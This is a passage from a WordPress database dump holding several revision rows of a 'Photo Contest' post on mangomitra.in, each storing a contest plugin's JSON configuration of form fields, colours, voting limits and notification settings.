0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 14:29:39','2022-02-09 08:59:39','',900,'https://mangomitra.in/?p=911',0,'revision','',0),(912,1,'2022-02-09 14:40:19','2022-02-09 09:10:19','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"e2800e39-e84b-445f-b23e-69e6509adbd3\",\"type\":\"number\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 14:40:19','2022-02-09 09:10:19','',900,'https://mangomitra.in/?p=912',0,'revision','',0),(913,1,'2022-02-09 14:44:35','2022-02-09 09:14:35','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"49a0b086-30fd-490c-be13-c018891d5207\",\"type\":\"text\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 14:44:35','2022-02-09 09:14:35','',900,'https://mangomitra.in/?p=913',0,'revision','',0),(914,1,'2022-02-09 14:44:53','2022-02-09 09:14:53','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"49a0b086-30fd-490c-be13-c018891d5207\",\"type\":\"text\",\"name\":\"field_copy_copy\",\"label\":\"Mobile 